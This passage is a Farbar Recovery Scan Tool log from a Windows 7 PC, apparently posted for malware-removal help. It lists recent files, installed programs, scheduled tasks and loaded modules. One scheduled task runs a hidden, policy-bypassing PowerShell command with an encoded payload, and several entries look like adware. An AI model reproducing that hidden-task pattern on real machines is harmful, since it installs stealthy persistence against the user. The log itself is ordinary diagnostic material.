2015-12-23 02:20 - 2015-11-10 00:14 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-12-23 02:20 - 2015-11-10 00:12 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-12-23 02:20 - 2015-11-08 23:33 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-12-23 02:20 - 2015-11-08 23:32 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-12-23 02:20 - 2015-11-08 23:15 - 02887168 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-12-23 02:20 - 2015-11-08 23:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-12-23 02:20 - 2015-11-08 23:06 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-12-23 02:20 - 2015-11-08 23:01 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-12-23 02:20 - 2015-11-08 22:52 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-12-23 02:20 - 2015-11-08 22:40 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-12-23 02:20 - 2015-11-08 22:32 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-12-23 02:20 - 2015-11-08 22:29 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2015-12-23 02:20 - 2015-11-08 22:15 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-12-23 02:20 - 2015-11-08 22:15 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-12-23 02:20 - 2015-11-08 21:41 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-12-23 02:20 - 2015-11-05 20:05 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\wshrm.dll
2015-12-23 02:20 - 2015-11-05 20:02 - 00014848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wshrm.dll
2015-12-23 02:20 - 2015-11-05 20:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2015-12-23 02:20 - 2015-11-05 20:00 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2015-12-23 02:20 - 2015-11-05 10:53 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rmcast.sys
2015-12-23 02:20 - 2015-11-03 20:04 - 00802304 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2015-12-23 02:20 - 2015-11-03 19:56 - 00627712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2015-12-23 02:19 - 2015-11-11 17:21 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-12-23 02:19 - 2015-11-11 16:12 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-12-23 02:19 - 2015-11-10 01:24 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-12-23 02:19 - 2015-11-10 01:12 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2015-12-23 02:19 - 2015-11-10 01:03 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-12-23 02:19 - 2015-11-10 00:47 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-12-23 02:19 - 2015-11-10 00:46 - 04514816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-12-23 02:19 - 2015-11-10 00:37 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2015-12-23 02:19 - 2015-11-10 00:35 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-12-23 02:19 - 2015-11-10 00:17 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-12-23 02:19 - 2015-11-08 23:16 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-12-23 02:19 - 2015-11-08 23:15 - 00571392 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-12-23 02:19 - 2015-11-08 23:15 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-12-23 02:19 - 2015-11-08 23:14 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-12-23 02:19 - 2015-11-08 23:07 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-12-23 02:19 - 2015-11-08 23:04 - 05923840 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-12-23 02:19 - 2015-11-08 23:02 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-12-23 02:19 - 2015-11-08 23:01 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-12-23 02:19 - 2015-11-08 23:01 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-12-23 02:19 - 2015-11-08 23:01 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-12-23 02:19 - 2015-11-08 22:48 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-12-23 02:19 - 2015-11-08 22:35 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-12-23 02:19 - 2015-11-08 22:18 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2015-12-23 02:19 - 2015-11-08 22:14 - 14456832 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-12-23 02:19 - 2015-11-08 22:14 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-12-23 02:19 - 2015-11-08 22:13 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-12-23 02:19 - 2015-11-08 21:53 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-12-23 02:19 - 2015-11-08 21:30 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-12-23 02:18 - 2015-11-03 20:04 - 00241664 _____ (Microsoft Corporation) C:\Windows\system32\els.dll
2015-12-23 02:18 - 2015-11-03 19:55 - 00179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\els.dll
2015-12-23 02:13 - 2015-12-23 02:13 - 00019320 _____ C:\Windows\System32\Tasks\{6D9AE6C4-E019-018C-C9B4-9E2714B48E10}
2015-12-07 03:52 - 2015-12-07 03:52 - 00000000 ____D C:\ProgramData\{08a2d2e5-4064-0}
2015-12-07 03:52 - 2015-12-07 03:52 - 00000000 ____D C:\ProgramData\{07fc38b7-3064-1}

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-12-25 23:58 - 2009-07-14 04:20 - 00000000 ____D C:\Windows
2015-12-25 23:55 - 2014-09-26 23:46 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Spotify
2015-12-25 23:42 - 2014-06-02 00:55 - 00000000 ____D C:\Program Files (x86)\Steam
2015-12-25 23:42 - 2014-05-20 22:58 - 00000992 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-12-25 23:41 - 2009-07-14 05:45 - 00025760 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-12-25 23:41 - 2009-07-14 05:45 - 00025760 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-12-25 23:39 - 2009-07-14 10:16 - 00495838 _____ C:\Windows\system32\perfh014.dat
2015-12-25 23:39 - 2009-07-14 10:16 - 00096254 _____ C:\Windows\system32\perfc014.dat
2015-12-25 23:39 - 2009-07-14 06:13 - 01365432 _____ C:\Windows\system32\PerfStringBackup.INI
2015-12-25 23:39 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2015-12-25 23:34 - 2014-09-26 23:47 - 00000000 ____D C:\Users\Simon\AppData\Local\Spotify
2015-12-25 23:33 - 2014-05-20 22:58 - 00000988 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-12-25 23:33 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-12-25 23:22 - 2015-06-12 18:39 - 00000000 ____D C:\Users\Simon\AppData\Local\Adobe
2015-12-25 22:11 - 2015-04-19 23:32 - 00000000 __SHD C:\Users\Simon\AppData\LocalLow\EmieBrowserModeList
2015-12-25 22:11 - 2014-06-17 17:59 - 00000000 __SHD C:\Users\Simon\AppData\LocalLow\EmieUserList
2015-12-25 22:11 - 2014-06-17 17:59 - 00000000 __SHD C:\Users\Simon\AppData\LocalLow\EmieSiteList
2015-12-25 22:00 - 2009-07-14 03:34 - 00000215 _____ C:\Windows\system.ini
2015-12-25 22:00 - 2009-07-14 03:34 - 00000027 _____ C:\Windows\system32\Drivers\etc\hosts.old
2015-12-25 21:47 - 2014-05-20 22:59 - 00002177 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-12-25 21:37 - 2014-05-20 22:58 - 00003988 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-12-25 21:37 - 2014-05-20 22:58 - 00003736 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-12-25 21:33 - 2015-03-29 22:17 - 00000000 ____D C:\Program Files (x86)\Chime
2015-12-25 21:33 - 2015-01-28 23:35 - 00000000 ____D C:\Program Files (x86)\nicEdeeall
2015-12-25 21:33 - 2015-01-28 23:34 - 00000000 ____D C:\Program Files (x86)\UpDown page without arrows
2015-12-25 21:33 - 2015-01-28 23:34 - 00000000 ____D C:\Program Files (x86)\nicedeial
2015-12-25 21:17 - 2015-05-17 00:39 - 00000000 ____D C:\Users\Simon\AppData\Local\SteelSeries Engine 3 Client
2015-12-25 21:17 - 2014-05-21 05:16 - 00000000 ____D C:\Users\Simon\AppData\Local\SteelSeries_ApS
2015-12-25 21:17 - 2014-05-21 05:15 - 00000000 ____D C:\Users\Simon\AppData\Roaming\SteelSeries
2015-12-25 21:17 - 2014-05-21 05:12 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SteelSeries
2015-12-25 21:17 - 2014-05-21 05:12 - 00000000 ____D C:\ProgramData\SteelSeries
2015-12-25 21:17 - 2014-05-21 05:09 - 00000000 ____D C:\Program Files\SteelSeries
2015-12-25 21:17 - 2009-07-14 06:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-12-25 21:16 - 2014-10-07 19:03 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Equalify
2015-12-25 21:15 - 2014-05-29 18:59 - 00000000 ____D C:\Users\Simon\AppData\Roaming\uTorrent
2015-12-25 21:14 - 2014-05-21 05:03 - 00000000 ____D C:\Users\Simon\AppData\Local\CrashDumps
2015-12-25 21:02 - 2015-07-03 21:25 - 00072415 _____ C:\Users\Simon\Desktop\cfg.rar
2015-12-25 20:45 - 2009-07-14 05:45 - 04951560 _____ C:\Windows\system32\FNTCACHE.DAT
2015-12-25 20:42 - 2015-04-14 12:16 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2015-12-25 20:42 - 2015-04-14 12:16 - 00000000 ___SD C:\Windows\system32\GWX
2015-12-23 03:13 - 2014-05-20 19:25 - 01341938 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2015-12-23 03:06 - 2014-05-20 21:51 - 00000000 ____D C:\Windows\system32\MRT
2015-12-23 03:02 - 2014-05-20 21:51 - 140158008 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-12-07 03:29 - 2014-12-24 22:10 - 00000000 ____D C:\Windows\system32\appraiser
2015-12-07 03:29 - 2014-05-21 14:11 - 00000000 ___SD C:\Windows\system32\CompatTel
2015-12-07 03:29 - 2009-07-14 10:54 - 00000000 ____D C:\Program Files\Windows Journal
2015-12-02 13:18 - 2014-05-23 16:14 - 00301728 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

==================== Files in the root of some directories =======

2014-09-06 19:36 - 2014-09-06 19:36 - 1177208 _____ () C:\Users\Simon\AppData\Roaming\AndyCleanupTool.exe
2014-09-06 19:36 - 2014-09-06 19:36 - 1176696 _____ () C:\Users\Simon\AppData\Roaming\AndyCleanVM.exe
2014-12-02 19:05 - 2015-06-29 19:41 - 0001456 _____ () C:\Users\Simon\AppData\Local\Adobe Save for Web 13.0 Prefs
2015-05-30 13:19 - 2015-05-30 13:27 - 0000000 _____ () C:\Users\Simon\AppData\Local\Driver_LOM_8161Present.flag
2015-05-18 15:37 - 2015-05-18 15:37 - 0007597 _____ () C:\Users\Simon\AppData\Local\Resmon.ResmonCfg
2015-04-13 22:45 - 2015-04-14 02:01 - 0011710 _____ () C:\Users\Simon\AppData\Local\Temp-log.txt

Some files in TEMP:
====================
C:\Users\Simon\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-12-25 22:58

==================== End of FRST.txt ============================

Then the addon log:

Additional scan result of Farbar Recovery Scan Tool (x64) Version:25-12-2015
Ran by Simon (2015-12-25 23:58:54)
Running from C:\Users\Simon\Downloads
Windows 7 Professional Service Pack 1 (X64) (2014-05-20 18:13:56)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1743091598-2114630970-4208458173-500 - Administrator - Disabled)
Gjest (S-1-5-21-1743091598-2114630970-4208458173-501 - Limited - Disabled)
Simon (S-1-5-21-1743091598-2114630970-4208458173-1000 - Administrator - Enabled) => C:\Users\Simon

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.1.418 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.235 - Adobe Systems Incorporated)
Adobe Illustrator CC (HKLM-x32\...\{F2321021-08A2-44D6-B1DF-BDB415F23EC3}) (Version: 17.0 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\Adobe Photoshop CS6) (Version: 13.0.0.0 - © The Computer Guy Tony)
Adobe Premiere Pro CC 2014 (HKLM-x32\...\{07BE616F-9E42-4C90-AF4F-0F32A5B088E7}) (Version: 8.0.1 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.11) - Norsk (HKLM-x32\...\{AC76BA86-7AD7-1044-7B44-AB0000000001}) (Version: 11.0.11 - Adobe Systems Incorporated)
Bandicam (HKLM-x32\...\Bandicam) (Version: 2.1.0.708 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Box Edit (HKLM-x32\...\{145BEAC3-F9E4-432B-AFD3-D36216C4C355}) (Version: 3.0.24.493 - Box)
CCleaner (HKLM\...\CCleaner) (Version: 5.04 - Piriform)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
ETDWare PS/2-X64 11.13.6.2_WHQL (HKLM\...\Elantech) (Version: 11.13.6.2 - ELAN Microelectronic Corp.)
Fotogalleri (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version:  - Facepunch Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Gyazo 3.1.6 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version:  - Nota Inc.)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3412 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.2.1000 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.3.34 - Intel Corporation)
Intel® PROSet/Wireless-programvare (HKLM-x32\...\{105fa5c4-72e1-41f2-a82c-884d8aa4b381}) (Version: 16.6.0 - Intel Corporation)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.670 - Oracle)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
K-Lite Codec Pack 10.6.5 Basic (HKLM-x32\...\KLiteCodecPack_is1) (Version: 10.6.5 - )
Malwarebytes Anti-Malware versjon 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 43.0.2 (x86 nb-NO) (HKLM-x32\...\Mozilla Firefox 43.0.2 (x86 nb-NO)) (Version: 43.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.2 - Mozilla)
MSI Afterburner 4.1.0 (HKLM-x32\...\Afterburner) (Version: 4.1.0 - MSI Co., LTD)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6.9 - Notepad++ Team)
NVIDIA GeForce Experience 2.2.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.2.2 - NVIDIA Corporation)
NVIDIA Grafikkdriver 347.25 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 347.25 - NVIDIA Corporation)
NVIDIA PhysX systemprogramvare 9.14.0702 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.14.0702 - NVIDIA Corporation)
OpenOffice 4.1.1 (HKLM-x32\...\{FBEB2D26-74E6-4DEE-B6CE-0EB3B92DE777}) (Version: 4.11.9775 - Apache Software Foundation)
Oracle VM VirtualBox 4.3.12 (HKLM\...\{B5121457-0126-4E62-BCBF-6DC7C73D9E4A}) (Version: 4.3.12 - Oracle Corporation)
PDF Settings CC (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.21249 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7179 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{9DAABC60-A5EF-41FF-B2B9-17329590CD5}) (Version: 1.00.0235 - REALTEK Semiconductor Corp.)
SHIELD Streaming (Version: 4.0.1000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 17.12.8 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Spotify) (Version: 1.0.20.94.g8f8543b3 - Spotify AB)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version:  - Valve)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Tixati (HKLM-x32\...\tixati) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
XSplit Gamecaster (HKLM-x32\...\{192BAAFE-0440-45C5-8E9C-FA6F8581EC8F}) (Version: 1.5.1401.2102 - SplitMediaLabs)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {09243C41-78C6-4705-8A44-74ADF37148A0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-25] (Google Inc.)
Task: {15DCE0F0-4638-4ED2-8AE8-E66A1F6E8071} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Task: {204D1C36-0B82-472C-9C74-22463EC1EE14} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\21.0.0.100\SymErr.exe
Task: {2082BF41-00C5-4D3E-96FC-2E0BE3811523} - System32\Tasks\AdobeAAMUpdater-1.0-Simon-PC-Simon => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe
Task: {3DBE0C46-2759-4AD2-B89E-6C57BF404C98} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-03-13] (Piriform Ltd)
Task: {43F525B2-5189-4065-ACCB-7B97D48305FD} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {48E19AF3-2DD9-4715-A5DA-EF87694CDB2A} - System32\Tasks\{B9242E84-7B66-4DAB-9F83-6C1F55A37D6E} => pcalua.exe -a E:\Autorun.exe -d E:\
Task: {55749066-36D7-4CAF-88BF-B6CB1C3EF9EE} - System32\Tasks\{353FBC57-6237-441C-B63B-98BC2D9D416F} => pcalua.exe -a E:\CDSetup.exe -d E:\
Task: {6D238D9B-024B-4127-95BE-82B7AA15D31D} - System32\Tasks\{9C7E7CD6-234F-42F0-A024-3B1422CA0E10} => Firefox.exe hxxp://ui.skype.com/ui/0/7.4.0.102/no/abandoninstall?page=tsProgressBar
Task: {7F87DC8C-6CDF-4B37-BCB4-18B00E818746} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-25] (Google Inc.)
Task: {883668A6-F707-4DDF-A886-505891E36532} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {8ED8F4F8-4365-4431-AA39-7536BCA6F5A1} - System32\Tasks\{6D9AE6C4-E019-018C-C9B4-9E2714B48E10} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand 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
Task: {979D3DBD-25E6-45A0-94F9-9C65718D37D3} - System32\Tasks\Norton Anti-Theft\Norton Error Analyzer => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.9.0.14\SymErr.exe
Task: {9D3995D8-EDC8-49DE-A458-88F17D3EA586} - System32\Tasks\PornTime => C:\Program Files (x86)\PornTime\pt.exe
Task: {A564F7B1-A5A8-4A4D-A4BD-EDA62AD2FADE} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\21.0.0.100\SymErr.exe
Task: {AB055F26-183D-4829-AE93-8E290BD1CBCA} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\21.0.0.100\WSCStub.exe
Task: {B3E7FCC8-AD9C-44DD-952D-229AA7603D16} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {C52EA3BE-0342-4D28-B6C5-C7DE7FB77130} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {DBAA2EE1-0D9E-42A6-A5D1-2464AAE7B572} - System32\Tasks\Norton Anti-Theft\Norton Error Processor => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.9.0.14\SymErr.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2014-05-20 19:33 - 2015-01-10 00:29 - 00117392 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2012-10-25 07:45 - 2012-10-25 07:45 - 00034304 _____ () C:\Windows\System32\sdo1ml6.dll
2014-07-16 10:06 - 2014-07-16 10:06 - 00672416 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
